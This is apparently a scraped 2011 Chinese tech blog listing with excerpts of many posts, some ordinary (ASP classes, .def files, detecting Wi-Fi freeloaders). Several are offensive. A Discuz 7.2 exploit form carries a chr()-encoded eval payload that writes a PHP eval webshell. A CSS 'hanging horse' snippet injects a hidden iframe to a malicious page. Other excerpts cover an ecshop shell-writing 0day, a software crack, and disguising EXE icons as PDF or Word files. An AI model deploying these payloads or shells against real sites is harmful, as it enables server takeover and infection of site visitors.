asp fso参考手册
作者:admin 日期:2011-02-16
查看占用端口的进程
作者:admin 日期:2011-02-16
ecshop后台写shell
作者:admin 日期:2011-02-16
------------------------------------------------------------------------------
Title:ecshop后台写shell 0day
Author: xhm1n9[ESST]
EMail:xhm1n9@0x70.com
Site: http://www.x-xox-x.net
Date: 2010-12-27 10:22:15
From: http://x-xox-x.net/exploit/11
3月份的东西,现在发出来。
adminedit_languages.php
相关变量没过滤!
elseif ($_REQUEST['act'] == 'edit')
{
/* 语言项的路径 */
$lang_file = isset($_POST['file_path']) ? trim($_POST['file_path']) : '';
/* 替换前的语言项 */
$src_items = !empty($_POST['item']) ? stripslashes_deep($_POST['item']) : '';
Tags: ecshop webshell ecshop拿shell
发IRP强制删除文件
作者:admin 日期:2011-02-16
学习了下,顺便加点注释。这个程序比较简单,主要练习了两个点:
(1)模拟发送IRP
(2)使用内核事件对象同步IRP的执行
强制删除文件的思路很简单,把SECTION_OBJECT_POINTERS结构的DataSectionObject和ImageSectionObject两个域清空即可删除正在运行的文件。如果不清空就不能删除运行中的文件。正在运行的文件的这两个域值不为0而文件系统正在根据这两个域决定该文件是否可以删除。如果文件系统检测这两个值为0,就理解为文件没有被使用,可以删除。接下去,就是直接发IRP。
测试时,在C盘目录下放一个test.exe并执行,然后加载驱动即可。
强制删除文件功能在ForceDeleteFile中实现,DriverEntry中只需要简单调用即可。具体实现如下
资源操作相关函数
作者:admin 日期:2011-02-12
最近遇到了这样个问题:编程实现修改EXE程序的图标,比如把一个EXE程序图标改为pdf、word等图标。。。。。
问题终于解决了,其中最主要的就是涉及到资源函数的相应操作。故发此文。。。。。。。。。
1、FindResource函数:该函数确定指定模块中指定类型和名称的资源所在位置。
HRSRC FindResource(
HMODULE hModule, //资源所在EXE、DLL模块句柄;
LPCWSTR lpName, //资源名称
LPCWSTR lpType ); //资源类型
返回值:成功则返回资源句柄,将此句柄传递给LoadResource函数。
注意:如果参数lpType或lpName的高字节为O,那么其低字节中所给定的资源的类
型或名称标识说明。另外,这些参数指向以NULL为终止符的字符串。字符串的第
一个字符是#,后面的字符表示十进制数来表示源类型或名称的整数标识符。例
DLL中导出全局变量
作者:admin 日期:2011-02-12
vc 模块定义(def) 文件
作者:admin 日期:2011-02-12
vc 模块定义 (.def) 文件2008年08月03日 星期日 16:33模块定义 (.def) 文件为链接器提供有关被链接程序的导出、属性及其他方面的信息。生成 DLL 时,.def 文件最有用。由于存在可代替模块定义语句使用的链接器选项,通常不需要 .def 文件。也可以将 __declspec(dllexport) 用作指定导出函数的手段。
在链接器阶段可以使用 /DEF(指定模块定义文件)链接器选项调用 .def 文件。
如果生成的 .exe 文件没有导出,使用 .def 文件将使输出文件较大并降低加载速度。
有关更多信息,请参见下列章节:
Tags: def vc vc 模块定义(def) 文件
ultraedit16.20序列号
作者:admin 日期:2011-02-06
ultraedit16.20序列号
闲话不说,直接上破解方法。
首先下载官网的软件:地址(http://www.ultraedit.com/files/ue_chinese.zip)
安装。
视频和声音错位
作者:admin 日期:2011-02-05
如何防止蹭网
作者:admin 日期:2011-02-03
蹭网,不用说大家都知道。就是用一个大功率的无线网卡,破解了人家的密码,然后在别人不知情的情况下连接路由器上网。这里不多说,直接说说怎么防止蹭网。
先说说怎么发现蹭网吧。
- 因为我现在用的是win7,所以以win7为例。打开计算机,点击一下左侧的那个网络标志。就会发现局域网中的一些机器。看看有米有不认识的,不认识的话去找你的同伴问问他的计算机名。当然盗网者也可以设置不被发现。这样这种方法就失效了。
- 说说第二种方法。打开浏览器,输入路由器的地址,比如是192.168.1.1。登陆之后点击左侧的DHCP服务器,然后点击客户端列表。这样就会发现所有的电脑。这种方法的可靠之处在于可以发现所有的电脑,所以大家可以根据计算机名,或者MAC地址去核对有没有人蹭网。
有这两种方法基本上就可以发现蹭网者了。
如何知道自己的MAC地址?好我告诉你两个方法。
- 打开计算机,右击左侧的网络图标,选择属性。来到网络和共享中心。单击右边的本地连接,然后单击详细信息按钮。这时可以看到自己的物理地址,也就是MAC地址了。00-D8-A1-40-9F-62,一般是这种格式。
- 第二种方法更简单,用到了命令行。按一下快捷键win+R打开运行对话框,输入cmd,出现命令提示符窗口。输入ipconfig /all 也可以看到自己的物理地址。
Tags: 如何防止蹭网
玩转arp
作者:admin 日期:2011-02-03
CSS挂马代码的方法
作者:admin 日期:2011-02-03
网上流行的:
body
{
background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")')
}
//此方法会使主页不正常.返回一片空白.
用弹窗.
body
{
background-image: url('javascript:open("http://192.168.0.5/test.htm")')
}
//弹出一个框.难看 易被发现.
改进一下:
SA沙盘模式下不用恢复xp_cmdshell和xplog70.dll也执行命令
作者:admin 日期:2011-02-03
bat for语句详解
作者:admin 日期:2011-02-03
Linux下五个各具特点的音乐播放器
作者:admin 日期:2011-02-02
cmd命令大全
作者:admin 日期:2011-02-02
ASP:class Property Get、Property Let 使用说明
作者:admin 日期:2011-02-01
<%
’在 Class 块中,成员通过相应的声明语句被声明为 Private(私有成员,只能在类内部调用) 或 Public(公有成员,能在类内外部调用) 。
’被声明为 Private 的将只在 Class 块内是可见的。被声明为 Public 不仅在 Class 块的内部是可见的,对 Class 块之外的代码也是可见的。
’没有使用 Private 或 Public 明确声明的被默认为 Public。在类的块内部被声明为 Public 的过程(Sub 或 Function)将成为类的方法。
’Public 变量将成为类的属性,同使用 Property Get、Property Let 和 Property Set 显式声明的属性相同。
’类的缺省属性和方法是在他们的声明部分用 Default 关键字指定的。
Class myClass
’//----声明(声明就是定义)myClass类的类内部(私有的[Private])变量
Private strAuthor
Private strVersion
Private strExample
discuz 7.2漏洞利用代码
作者:admin 日期:2011-02-01
使用该exp的话仅限本机测试,其他用途后果自负!
第一种方法:
先注册个用户然后把
<form method="post" action=" http://www.xxx.com/bbs/misc.php" enctype="multipart/form-data">
帖子ID,指定一个存在的帖子即可:<input type="text" name="tid" value="1" />
<input type="hidden" name="action" value="imme_binding" />
<input type="hidden" name="response[result]" value="1:2" />
<input type="hidden" name="scriptlang[1][2]" value="${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}" />
<input type="submit" name="topicsubmit" value="提交" class="submit" />
</form>
chr解码后是:value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'<?php eval($_POST[cmd])?>');
里面有个提交地址改下,保存html
打开点提交,会生产forumdata/cache/usergroup_01.php一句话文件,密码是cmd
Tags: discuz 7.2漏洞
C语言递归详解
作者:admin 日期:2011-02-01
如何解除Google搜索限制
作者:admin 日期:2011-02-01
n久以前Google离开了中国,变成了www.google.com.hk。为什么离开中国,具体原因我不知道,应该是跟搜索结果过滤什么的有关系。这种方法也是我无意当中在一位朋友的博客里面看到的,具体地址我忘记了。不过方法我倒是还记得。给出如下方法:
Tags: Google 限制 解除Google限制
